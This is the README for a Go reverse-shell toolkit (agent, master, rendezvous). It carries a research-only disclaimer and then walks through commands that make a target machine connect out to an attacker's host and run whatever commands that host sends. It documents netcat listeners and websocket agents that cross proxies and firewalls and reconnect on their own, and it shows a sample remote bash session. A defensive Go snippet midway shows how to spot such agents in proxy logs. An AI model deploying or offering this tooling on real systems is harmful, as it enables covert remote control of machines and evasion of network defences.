reverse-shell's Introduction

Disclaimer: This project is for research purposes only, and should only be used on authorized systems. Accessing a computer system or network without authorization or explicit permission is illegal. My primary goal was to write some Go.

Introduction

"A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved." (source)

Of course the simplest and most portable way is to use Netcat.

Here are some features of this Go implementation:

  • good portability
  • can cross most proxies and firewalls with default configuration (using websockets, on https, on standard ports)
  • auto-reconnection
  • supports having multiple shells running on a single agent

This project contains 3 applications that help you set up and interact with remote shells:

  • an agent to be started on the server where you want to open a shell
  • a master that waits for agent connections and allows you to interact with the shells
  • a rendezvous application providing a central point where agents and masters meet when a direct connection is not possible/wanted (not mandatory)

Installation

Download the binaries

$ curl -L -s https://github.com/maxlaverse/reverse-shell/releases/download/v0.0.1/reverse-shell-0.0.1-linux-amd64.tar.gz | tar xvz

Or build from source

$ git clone https://github.com/maxlaverse/reverse-shell
$ cd reverse-shell && make

Agent

The agent is an application that will start one or multiple shells and allow a master to control them.

Usage:
  agent [OPTIONS] <command>

Available commands:
  stdin      Start a stdin agent
  tcp        Start a tcp agent and connect to a remote master
  tcpdirect  Start a tcpdirect agent and listen on a tcp port waiting for orders
  websocket  Start a websocketCommand agent and connect to a remote master or rendez-vous

stdin

Absolutely useless. It's basically just piping stdin to a process on the same machine.

Usage:
  agent [OPTIONS] stdin

tcp

Connect to a remote host and execute every command received from it.

Usage:
  agent [OPTIONS] tcp [tcp-OPTIONS]

[tcp command options]
      -A, --address= Address [$ADDRESS]

Use the listen master command on a remote host to wait for a connection:

# On the master (1.2.3.4)
$ nc -v -l -p 7777

# On the target
$ agent tcp -A 1.2.3.4:7777

tcpdirect

Listen on a TCP port and execute every command received from a master.

Usage:
  agent [OPTIONS] tcpdirect [tcp-OPTIONS]

  [tcpdirect command options]
        -P, --port= Port [$PORT]

You can connect to it using netcat:

# On the agent (1.2.3.4)
$ agent tcpdirect -P 7777

# On the master
$ nc 1.2.3.4 7777

websocket

Connect to a remote websocket and execute every command received. The remote host can be a master or a rendezvous.

Usage:
  agent [OPTIONS] websocket [websocket-OPTIONS]

[websocket command options]
      -U, --url=  Url of the rendez-vous point. [$URL]

# On the master (1.2.3.4)
$ master listen -P 7777

# On the agent
$ agent websocket -U http://1.2.3.4:7777

Once an agent connects, you will be able to write commands in stdin that will be directly executed on the agent. You can also connect to a rendezvous point instead of a master.

You can also connect to the outside using a proxy:

$ http_proxy=http://your-proxy:3128 https_proxy=http://your-proxy:3128 agent websocket -U http://1.2.3.4:7777
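Seen from the proxy, every connection or auto-reconnection of a websocket agent is an HTTP 101 upgrade, which gives defenders something to count. The block below is an added example, not part of this project's code: it tallies completed upgrades per client and destination in a constructed proxy log and keeps the non-allowlisted pairs that repeat. The log format, the allowlist and the name `Detect` are assumptions, and for https destinations the proxy only sees the upgrade if it inspects TLS.

```go
package main

import (
	"fmt"
	"net"
	"strings"
)

// Constructed proxy log: "epoch client method destination status upgrade".
const sampleLog = `1700000000 10.0.0.5 GET 1.2.3.4:7777 101 websocket
1700000060 10.0.0.5 GET 1.2.3.4:7777 101 WebSocket
1700000125 10.0.0.5 GET 1.2.3.4:7777 101 websocket
1700000130 10.0.0.8 GET chat.example.com:443 101 websocket
1700000150 10.0.0.9 GET 203.0.113.7:80 101 websocket
1700000160 10.0.0.9 GET www.example.org:80 200 -
truncated line`

// Detect counts completed WebSocket handshakes (HTTP 101) per "client -> dest",
// skips allowlisted hosts, and keeps only the pairs seen at least minUpgrades
// times, the pattern an auto-reconnecting agent leaves in the log.
func Detect(log string, allowed map[string]bool, minUpgrades int) map[string]int {
	counts := map[string]int{}
	for _, line := range strings.Split(log, "\n") {
		f := strings.Fields(line)
		if len(f) != 6 || f[4] != "101" || !strings.EqualFold(f[5], "websocket") {
			continue // malformed line, or not a completed WebSocket handshake
		}
		host, _, err := net.SplitHostPort(f[3])
		if err != nil {
			host = f[3] // destination was logged without a port
		}
		if !allowed[strings.ToLower(host)] {
			counts[f[1]+" -> "+f[3]]++
		}
	}
	for pair, n := range counts {
		if n < minUpgrades {
			delete(counts, pair) // a single upgrade is below the reporting threshold
		}
	}
	return counts
}

func main() {
	allowed := map[string]bool{"chat.example.com": true} // assumed allowlist
	fmt.Println(Detect(sampleLog, allowed, 2))
}
```

Raising `minUpgrades` reduces noise from one-off WebSocket use, at the cost of missing an agent that has connected only once.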

Rendez-vous

The rendezvous is an HTTP server listening for agents and masters. It can run behind a reverse proxy, and that reverse proxy could do SSL offloading.

Usage:
  rendezvous [OPTIONS]

Application Options:
  -P, --port= Port [$PORT]

Start the rendezvous and the agent:

# On the rendezvous (1.2.3.4)
$ rendezvous -P 7777

# On the agent (3.4.5.6)
$ agent websocket -U http://1.2.3.4:7777

Open a shell and send some commands

# List the agents
$ ./master list-agents -U http://1.2.3.4:7777
List of agents:
* 3.4.5.6:65000

# Create a session
$ master create -U http://1.2.3.4:7777 3.4.5.6:65000
Attaching to admiring_meitn
Connected to admiring_meitn
bash-3.2$

Master

Usage:
  master [OPTIONS] <command>

Help Options:
  -h, --help  Show this help message

Available commands:
  attach         attach to an existing session
  create         create a new session on a given agent
  list-agents    list all the agents available on a rendez-vous
  list-sessions  list all the sessions available on a rendez-vous
  listen         listen for agents to connect using websocket

Todo

  • learn how to write proper tests
  • add scp-like commands
  • improve logging messages
  • read variables from environment
